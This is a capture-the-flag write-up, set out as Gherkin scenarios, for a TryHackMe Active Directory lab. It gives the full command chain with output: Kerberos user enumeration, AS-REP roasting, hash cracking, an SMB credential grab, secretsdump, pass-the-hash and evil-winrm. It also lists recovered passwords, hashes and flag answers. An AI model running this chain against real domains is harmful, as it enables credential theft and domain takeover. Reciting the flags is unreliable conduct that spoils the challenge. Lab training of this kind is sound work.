Feature:
  Site:
    TryHackMe
  Category:
    CTF
  User:
    ultrad
  Goal:
    Vulnerate system to get 3 flags.
  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Kali Linux      | 2020.2        |
    | nmap            | 7.80          |
    | enum4linux      | 0.8.9         |
    | kerbrute        | 1.0.2         |
    | impacket        | 0.9.22        |
    | smbclient       | 4.11.5-Debian |
    | evil-winrm      | 2.3           |
    | hashcat         | 6.0.0         |
    | git             | 2.27.0        |

  Machine Information:
    Given TryHackMe challenge URL
    """
    https://tryhackme.com/room/attacktivedirectory
    """
    When Initiate the VPN connection and deploy the machine
    """
    connet using openvpn
    """
    Then challenge statement
    """
    99% of Corporate networks run off of AD.
    But can you exploit a vulnerable Domain Controller?
    """
    And the machine ip address
    """
    10.10.71.93
    """
    Given Impacket installation
    When start task 2
    Then clone impacket to my local machine
    """
    git clone https://github.com/SecureAuthCorp/impacket.git
    """
    And save it to given path
    """
    opt/impacket/examples/
    """

  Scenario: Success: discovering with nmap scanning
    Given Me starting a scan with nmap
    """
    $ nmap -oN open_ports.txt -n 10.10.71.93
    """
    When Basic enumeration will yield a number of ports open
    Then output shows the result
    """
    ...
    53/tcp   open  domain
    80/tcp   open  http
    88/tcp   open  kerberos-sec
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    389/tcp  open  ldap
    445/tcp  open  microsoft-ds
    464/tcp  open  kpasswd5
    593/tcp  open  http-rpc-epmap
    636/tcp  open  ldapssl
    3268/tcp open  globalcatLDAP
    3269/tcp open  globalcatLDAPssl
    3389/tcp open  ms-wbt-server
    ...
    """
  Scenario: Success: Enumerate ports 139 and 445
    Given ports 139,445 from previous output
    When SMB, providing shared access to files
    Then try enum4linux and nmap commands
    """
    $ nmap -sC -sV --open -T5 --min-rate=1000 -p- -n 10.10.71.93
    $ enum4linux -A 10.10.71.93
    """
    And I get data
    """
    $ Domain Name: THM-AD
    $ DNS Domain Name: spookysec.local
    """

  Scenario: Success: Enumerate the DC
    Given userslist.txt file to brute force discovery of users
    When Cloning room creator challenge repository from github
    """
    $ https://github.com/Sq00ky/attacktive-directory-tools.git
    """
    Then use kerbrute tool
    """
    $ ./kerbrute userenum --dc 10.10.71.93
    -d spookysec.local userlist.txt -t 100
    """
    And get list of users that matched
    """
    [+] VALID USERNAME:       james@spookysec.local
    [+] VALID USERNAME:       svc-admin@spookysec.local
    [+] VALID USERNAME:       James@spookysec.local
    [+] VALID USERNAME:       robin@spookysec.local
    [+] VALID USERNAME:       darkstar@spookysec.local
    [+] VALID USERNAME:       administrator@spookysec.local
    [+] VALID USERNAME:       backup@spookysec.local
    [+] VALID USERNAME:       paradox@spookysec.local
    [+] VALID USERNAME:       JAMES@spookysec.local
    [+] VALID USERNAME:       Robin@spookysec.local
    [+] VALID USERNAME:       Administrator@spookysec.local
    [+] VALID USERNAME:       Darkstar@spookysec.local
    [+] VALID USERNAME:       Paradox@spookysec.local
    [+] VALID USERNAME:       DARKSTAR@spookysec.local
    [+] VALID USERNAME:       ori@spookysec.local
    [+] VALID USERNAME:       ROBIN@spookysec.local
    """

Scenario: Success: Exploting kerberos
    Given ASREPRoasting attack method with username from previous output
    When executing impacket GetNPUsers.py
    """
    $ GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin
    """
    Then found mode and type of kerberos hash
    """
    [*] Getting TGT for svc-admin
    $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:HASH
    """
    And use hashcat to crack the hash
    """
    hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force
    """
    Then password for user svc-admin is found
    """
    management2005
    """

Scenario: Success: Enumerate the DC using smbclient
    Given utility to map remote SMB shares
    """
    man smbclient
    """
    When having an username and his password
    Then execute smbclient to find list shares
    """
    smbclient -L 10.10.71.93 -U 'svc-admin'
    """
    And get shares in the output
    """
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    SYSVOL          Disk      Logon server share
    """
    Then see whats inside backup file
    """
    smbclient //10.10.71.93/backup -U 'svc-admin'
    more backup_credentials.txt
    """
    And decode the file output
    """
    base64 --decode backup_credentials.txt
    """
    Then get password for backup user
    """
    backup@spookysec.local:backup2517860
    """

Scenario: Success: Elevating priveleges
    Given backup account of DC with DRSUAPI method
    When  executing impacket-secretsdump
    """
    impacket-secretsdump -just-dc backup:backup2517860@10.10.71.93
    """
    Then get Administrator Hashes
    """
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:
    e4876a80a723612986d7609aa5ebc12b:::
    """
    And use pass the hash method to authenticate the user
    """
    psexec.py Administrator:@10.10.71.93 -hashes hash:hash
    """

Scenario: Success: Capture the flag
    Given evil-winrm tool
    When accessing with the gotten hash
    """
    evil-winrm -i 10.10.71.93 -u Administrator
    -H e4876a80a723612986d7609aa5ebc12b
    """
    Then get access to each users desktop
    """
    *Evil-WinRM* PS C:\Users\Administrator\Desktop>
    *Evil-WinRM* PS C:\Users\svc-admin\Desktop>
    *Evil-WinRM* PS C:\Users\backup\Desktop>
    """
    And capture the flags
    """
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
    TryHackMe{4ctiveD1rectoryM4st3r}
    ....
    *Evil-WinRM* PS C:\Users\svc-admin\Desktop> more user.txt.txt
    TryHackMe{K3rb3r0s_Pr3_4uth}
    ....
    *Evil-WinRM* PS C:\Users\backup\Desktop> more PrivEsc.txt
    TryHackMe{B4ckM3UpSc00ty!}
    """
